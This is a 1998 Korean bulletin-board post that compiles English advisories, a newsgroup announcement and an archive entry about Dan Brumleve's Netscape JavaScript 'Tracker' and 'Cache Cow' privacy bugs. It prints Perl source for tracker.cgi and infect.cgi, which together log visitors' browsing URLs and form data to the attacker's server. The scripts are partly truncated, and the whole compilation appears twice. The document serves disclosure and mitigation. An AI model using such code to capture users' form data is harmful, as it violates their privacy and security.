1998. 10. 1. 23:22
내발자국[동호회]
안녕하세요?
HiTEL go IUG 인터넷유저그룹 부시삽 솔아로미 이경 입니다.
이 자료는 최근 미국의 "USA Today"에서 최초(?)로 보도되자 우리나라 언론들에서
일제히 보도한 바 있는 미국 컴퓨터 컨설턴트인 Dan Brumleve의 넷스케이프 버그
에 관한 원본내용입니다.
[USA Today] http://www.usatoday.com
자료(1)
[출처] http://www.2cobbs.com/news/tracker.html
--===Tracker NetScape Navigator JavaScript Trojan Horse===--
_
-=NetScape Navigator JavaScript Trojan Horse=-
Below is a link to Dan Brumleve's page which demonstrates the Tracker
NetScape Navigator JavaScript Trojan Horse. Here is a screen shot of what the
sample exploitation does:
_Warning_: if you are using NetScape Navigator and have not disabled
Javascript before visiting this page, clicking on this link will commence the
tracking process, which _will_ record anything you enter into forms on pages
you visit during subsequent browsing, until you exit close the browser, even
if the page is "secure" and uses SSL. This affects versions through 3.02. It
does not affect Micrsoft Internet Explorer, but Tracker will try to load and
cause an error message.
Click here to visit Tracker page
http://www.aleph2.com/tracker
but you have been warned and we will not be
held responsible for what happens.
When we get a chance we will be adding some commentary on this item. In the
meantime, Alex Lash and Nick Wingfieled at CNET are doing a decent job of
"tracking" it (even if they didn't quote me :-)
+ July 11 CNET story
http://www.news.com/News/Item/0,4,12347,00.html
+ July 9 CNET story
http://www.news.com/News/Item/0,4,12282,00.html
This page updated July 12, 1997 by webloke [stephen@iu.net] Copyright, 1997,
_____________________________________________________________________
자료(2)
-=JavaScript and Java Privacy/Security Flaws=-
+ _9/25/98_ - (updated 2:00 PM 9/29 -0500) - Dan Brumleve reported a
JavaScript flaw in Netscape browsers and email clients that would allow a
malicious server operator to read the contents of a user's browser cache file
after the user merely visits the malicious page. This would allow the
malicious server to determine the URLs of pages the user has visited in the
past, and in some cases, the values the user has entered in forms on those
pages. The exploit can also be embedded in an email message and triggered by
merely reading the email message.
No malicious exploits of the flaw have been reported to date.
The flaw is said to apply to all versions of Netscape that support JavaScript,
that is all versions of Netscape from 2.x to 4.5b2. Microsoft Internet
Explorer is said not to be affected.
Netscape has acknowledged the bug and plans to release a fix within a week.
Until a fix is available, users of Netscape browsers are advised to _disable
JavaScript_ except when visiting known and trusted sites.
_____________________________________________________________________
자료(3)
출처: 뉴스그룹 참조
From: nothing@shout.net (Mr.Nothing)
Newsgroups: comp.lang.javascript,comp.infosystems.www.browsers.misc,
comp.infosystems.www.browsers.ms-windows,
comp.infosystems.www.browsers.x,comp.security.misc
Subject: New JavaScript Privacy Bug Found, Part 2
Date: 25 Sep 1998 23:45:40 GMT
Organization: Shouting Ground Technologies, Inc.
Hello.
I've discovered another JavaScript security hole. I've written
an exploit for it (called the Cache Cow) and it is being demonstrated
at the following URL:
http://www.shout.net/~nothing/cache-cow/index.html
The vulnerability allows anyone to steal the contents of your
browser history, including all form data that has ever been
sent via the GET method. It affects all versions of Netscape
that support JavaScript. It does not affect Internet Explorer.
The exploit only affects versions of Netscape prior to 4.06,
but an exploit for 4.06 will be demonstrated on the same page
shortly.
Also see
http://www.shout.net/~nothing/cache-cow/last-time.html
for my take on what happened the last time I made this kind of
announcement.
Dan Brumleve
_____________________________________________________________________
자료(4) 이 스크립트를 옮기는 과정에서 79라인으로 설정하여 일부분은 원본과
달리 줄바뀜이 있었으므로 스크립트를 살펴 조정하여 보시기 바랍니다.
[출처] http://oliver.efri.hr/~crv/security/bugs/mUNIXes/nscape6.html
COMMAND
javascript
SYSTEMS AFFECTED
Systems running Netscape
PROBLEM
This is variation to the javascript #1. I say variation since
CERT and Netscape are saying that Netscape 3.02 is fixing this,
it didn't appear to fix the problem demonstrated at:
http://www.aleph2.com/tracker/
This page demonstrates a bug discovered with Netscape's
implementation of JavaScript. If your version and platform is
affected, your subsequent browsing activities are currently being
tracked. Known affected versions are Netscape 3.x for all
platforms, including the just-released 3.02 which supposedly
fixes this problem. Credit goes to Dan Brumleve.
Here is the source of the two CGI scripts that make this work on
page mentioned above. An explanation of how the exploit works is
included as a comment in the tracker.cgi source.
Source of tracker.cgi (one part):
#!/usr/bin/perl
#
# JavaScript tracker -- Copyright (C) 1997 Dan Brumleve
#
# ----------------------------------------------------------------
# Explanation of the exploit:
#
# When your browser loads this page, another window ("infect.cgi")
# is created using the onLoad mechanism. If you're using
# X-windows this window will be placed off the screen because its
# size overflows into its position, otherwise it will simply be
# 0x0.
#
# When the "infect.cgi" window loads it sets the original window's
# onUnload function to some JavaScript code that copies the
# location and form data into the values of a form in the
# "infect.cgi" window. This should not be possible to do, but I
# found a way to use "javascript:" URLs to pass private data
# between windows.
#
# After the original window copies its information into the form
# in "infect.cgi" it tells that form to submit (the action being
# itself). Here is where the big problem happens: The original
# window's onUnload function exits before the "infect.cgi" window
# finishes changing location. By the time the "infect.cgi" window
# finishes submitting, the original window is at a new location,
# so the "infect.cgi" window changes the onUnload function of the
# new document as soon as it loads, and the cycle continues...
chop($tm = `date`);
$log = "/www/html/tracker/logs/log-$ENV{REMOTE_ADDR}.txt";
unless (-e $log) {
open(FP, "> $log");
print FP < Below is a list of all the URLs you've visited since
$tm, each one followed by the
contents of any forms on those pages.
EOT
close(FP);
}
print < Content-type: text/html
Tracker
link="#ff0000" vlink="#ff0000" alink="#ff0000"
onLoad="window.open('http://www.aleph2.com/tracker/infect.cgi', 'infect',
'width=65529,height=65536')">
.... [the original source of web page] ....
Source of infect.cgi:
#!/usr/bin/perl
#
# JavaScript tracker -- Copyright (C) 1997 Dan Brumleve
$infect = "http://www.aleph2.com/tracker/infect.cgi";
print < Content-type: text/html
Infect
EOF
exit 0 if fork;
if ($ENV{QUERY_STRING}) {
$input = $ENV{QUERY_STRING};
$fn = "/www/html/tracker/logs/log-" . $ENV{REMOTE_ADDR} . ".txt";
@fields = split(//, $input);
foreach $a (@fields) {
$a =~ s/\+/ /g;
($n, $v) = split(/=/, $a);
$v =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$input{$n} = $v;
}
@fields = split(/\n+/, $input{fd});
$fd = "";
foreach $f (@fields) {
$f = " " . $f;
$fd .= $f . "\n";
}
open(FP, ">> $fn") || die;
chop($tm = `date`);
print FP "$tm $input{url}\n$fd";
close(FP);
}
exit 0;
SOLUTION
Communicator 4.01 did not seem to be affected by the problem.
Users of Netscape 3.x version should upgrade to Netscape 3.04.
Since Netscape Navigator is installed by default on IRIX 6.2+
operating systems, solution for them is or to install or upgrade
to version 3.04 or later of the Netscape Navigator program.
Silicon Graphics provides a customized Netscape Navigator 3.04
subsystem for IRIX 5.3, 6.2, 6.3 and 6.4 and it can be found at
the following URL:
http://www.sgi.com/Products/Evaluation/
고맙습니다. 안녕히계세요.
*_수원에서_*_ 만석보를 바라보며_*_솔바우가_*
Copyright (C) by -=-=-=-다-모-아-정-보-통-신-=-=-=-=-=-=-=-=-=-=-=-
TEL.0331-252-3691 PCS.019-275-5269 PGR.015-8455-0095
경기도 수원시 장안구 화서동 644-5 그린프라자 5층 505호 인터넷
이 경 (Lee, Kyoung) HiTEL ID:LEESUN2 (솔아로미) leesun2@iwork.co.kr
Web-Hosting,Homepage,Javascript,Information-Contents-Provider(ICP)
Internet-Cunsulting,Internet-Tele-Marketing, Information-Retreiver
이 자료를 어떠한 방법으로든 옮길 경우 위 저작권표시를 포함하십시요.
HiTEL go IUG 인터넷유저그룹 부시삽 솔아로미 이경 입니다.
이 자료는 최근 미국의 "USA Today"에서 최초(?)로 보도되자 우리나라 언론들에서
일제히 보도한 바 있는 미국 컴퓨터 컨설턴트인 Dan Brumleve의 넷스케이프 버그
에 관한 원본내용입니다.
[USA Today] http://www.usatoday.com
자료(1)
[출처] http://www.2cobbs.com/news/tracker.html
--===Tracker NetScape Navigator JavaScript Trojan Horse===--
_
-=NetScape Navigator JavaScript Trojan Horse=-
Below is a link to Dan Brumleve's page which demonstrates the Tracker
NetScape Navigator JavaScript Trojan Horse. Here is a screen shot of what the
sample exploitation does:
_Warning_: if you are using NetScape Navigator and have not disabled
Javascript before visiting this page, clicking on this link will commence the
tracking process, which _will_ record anything you enter into forms on pages
you visit during subsequent browsing, until you exit close the browser, even
if the page is "secure" and uses SSL. This affects versions through 3.02. It
does not affect Micrsoft Internet Explorer, but Tracker will try to load and
cause an error message.
Click here to visit Tracker page
http://www.aleph2.com/tracker
but you have been warned and we will not be
held responsible for what happens.
When we get a chance we will be adding some commentary on this item. In the
meantime, Alex Lash and Nick Wingfieled at CNET are doing a decent job of
"tracking" it (even if they didn't quote me :-)
+ July 11 CNET story
http://www.news.com/News/Item/0,4,12347,00.html
+ July 9 CNET story
http://www.news.com/News/Item/0,4,12282,00.html
This page updated July 12, 1997 by webloke [stephen@iu.net] Copyright, 1997,
_____________________________________________________________________
자료(2)
-=JavaScript and Java Privacy/Security Flaws=-
+ _9/25/98_ - (updated 2:00 PM 9/29 -0500) - Dan Brumleve reported a
JavaScript flaw in Netscape browsers and email clients that would allow a
malicious server operator to read the contents of a user's browser cache file
after the user merely visits the malicious page. This would allow the
malicious server to determine the URLs of pages the user has visited in the
past, and in some cases, the values the user has entered in forms on those
pages. The exploit can also be embedded in an email message and triggered by
merely reading the email message.
No malicious exploits of the flaw have been reported to date.
The flaw is said to apply to all versions of Netscape that support JavaScript,
that is all versions of Netscape from 2.x to 4.5b2. Microsoft Internet
Explorer is said not to be affected.
Netscape has acknowledged the bug and plans to release a fix within a week.
Until a fix is available, users of Netscape browsers are advised to _disable
JavaScript_ except when visiting known and trusted sites.
_____________________________________________________________________
자료(3)
출처: 뉴스그룹 참조
From: nothing@shout.net (Mr.Nothing)
Newsgroups: comp.lang.javascript,comp.infosystems.www.browsers.misc,
comp.infosystems.www.browsers.ms-windows,
comp.infosystems.www.browsers.x,comp.security.misc
Subject: New JavaScript Privacy Bug Found, Part 2
Date: 25 Sep 1998 23:45:40 GMT
Organization: Shouting Ground Technologies, Inc.
Hello.
I've discovered another JavaScript security hole. I've written
an exploit for it (called the Cache Cow) and it is being demonstrated
at the following URL:
http://www.shout.net/~nothing/cache-cow/index.html
The vulnerability allows anyone to steal the contents of your
browser history, including all form data that has ever been
sent via the GET method. It affects all versions of Netscape
that support JavaScript. It does not affect Internet Explorer.
The exploit only affects versions of Netscape prior to 4.06,
but an exploit for 4.06 will be demonstrated on the same page
shortly.
Also see
http://www.shout.net/~nothing/cache-cow/last-time.html
for my take on what happened the last time I made this kind of
announcement.
Dan Brumleve
_____________________________________________________________________
자료(4) 이 스크립트를 옮기는 과정에서 79라인으로 설정하여 일부분은 원본과
달리 줄바뀜이 있었으므로 스크립트를 살펴 조정하여 보시기 바랍니다.
[출처] http://oliver.efri.hr/~crv/security/bugs/mUNIXes/nscape6.html
COMMAND
javascript
SYSTEMS AFFECTED
Systems running Netscape
PROBLEM
This is variation to the javascript #1. I say variation since
CERT and Netscape are saying that Netscape 3.02 is fixing this,
it didn't appear to fix the problem demonstrated at:
http://www.aleph2.com/tracker/
This page demonstrates a bug discovered with Netscape's
implementation of JavaScript. If your version and platform is
affected, your subsequent browsing activities are currently being
tracked. Known affected versions are Netscape 3.x for all
platforms, including the just-released 3.02 which supposedly
fixes this problem. Credit goes to Dan Brumleve.
Here is the source of the two CGI scripts that make this work on
page mentioned above. An explanation of how the exploit works is
included as a comment in the tracker.cgi source.
Source of tracker.cgi (one part):
#!/usr/bin/perl
#
# JavaScript tracker -- Copyright (C) 1997 Dan Brumleve
#
# ----------------------------------------------------------------
# Explanation of the exploit:
#
# When your browser loads this page, another window ("infect.cgi")
# is created using the onLoad mechanism. If you're using
# X-windows this window will be placed off the screen because its
# size overflows into its position, otherwise it will simply be
# 0x0.
#
# When the "infect.cgi" window loads it sets the original window's
# onUnload function to some JavaScript code that copies the
# location and form data into the values of a form in the
# "infect.cgi" window. This should not be possible to do, but I
# found a way to use "javascript:" URLs to pass private data
# between windows.
#
# After the original window copies its information into the form
# in "infect.cgi" it tells that form to submit (the action being
# itself). Here is where the big problem happens: The original
# window's onUnload function exits before the "infect.cgi" window
# finishes changing location. By the time the "infect.cgi" window
# finishes submitting, the original window is at a new location,
# so the "infect.cgi" window changes the onUnload function of the
# new document as soon as it loads, and the cycle continues...
chop($tm = `date`);
$log = "/www/html/tracker/logs/log-$ENV{REMOTE_ADDR}.txt";
unless (-e $log) {
open(FP, "> $log");
print FP <
$tm, each one followed by the
contents of any forms on those pages.
EOT
close(FP);
}
print <
link="#ff0000" vlink="#ff0000" alink="#ff0000"
onLoad="window.open('http://www.aleph2.com/tracker/infect.cgi', 'infect',
'width=65529,height=65536')">
.... [the original source of web page] ....
Source of infect.cgi:
#!/usr/bin/perl
#
# JavaScript tracker -- Copyright (C) 1997 Dan Brumleve
$infect = "http://www.aleph2.com/tracker/infect.cgi";
print <
EOF
exit 0 if fork;
if ($ENV{QUERY_STRING}) {
$input = $ENV{QUERY_STRING};
$fn = "/www/html/tracker/logs/log-" . $ENV{REMOTE_ADDR} . ".txt";
@fields = split(//, $input);
foreach $a (@fields) {
$a =~ s/\+/ /g;
($n, $v) = split(/=/, $a);
$v =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$input{$n} = $v;
}
@fields = split(/\n+/, $input{fd});
$fd = "";
foreach $f (@fields) {
$f = " " . $f;
$fd .= $f . "\n";
}
open(FP, ">> $fn") || die;
chop($tm = `date`);
print FP "$tm $input{url}\n$fd";
close(FP);
}
exit 0;
SOLUTION
Communicator 4.01 did not seem to be affected by the problem.
Users of Netscape 3.x version should upgrade to Netscape 3.04.
Since Netscape Navigator is installed by default on IRIX 6.2+
operating systems, solution for them is or to install or upgrade
to version 3.04 or later of the Netscape Navigator program.
Silicon Graphics provides a customized Netscape Navigator 3.04
subsystem for IRIX 5.3, 6.2, 6.3 and 6.4 and it can be found at
the following URL:
http://www.sgi.com/Products/Evaluation/
고맙습니다. 안녕히계세요.
*_수원에서_*_ 만석보를 바라보며_*_솔바우가_*
Copyright (C) by -=-=-=-다-모-아-정-보-통-신-=-=-=-=-=-=-=-=-=-=-=-
TEL.0331-252-3691 PCS.019-275-5269 PGR.015-8455-0095
경기도 수원시 장안구 화서동 644-5 그린프라자 5층 505호 인터넷
이 경 (Lee, Kyoung) HiTEL ID:LEESUN2 (솔아로미) leesun2@iwork.co.kr
Web-Hosting,Homepage,Javascript,Information-Contents-Provider(ICP)
Internet-Cunsulting,Internet-Tele-Marketing, Information-Retreiver
이 자료를 어떠한 방법으로든 옮길 경우 위 저작권표시를 포함하십시요.
'내발자국[동호회]' 카테고리의 다른 글
| [IPG981002] CD Creator 무료업데이트 외 (0) | 1998.10.03 |
|---|---|
| [검색/텔넷] BBS 검색링크 :Tele White (0) | 1998.10.02 |
| [자료] 넷스케이프 자바버그 캐시카우 (0) | 1998.10.01 |
| [중고차/매매] 유즈드라인 (0) | 1998.10.01 |
| [외교/통상] 재외공관 통합 홈페이지 (0) | 1998.10.01 |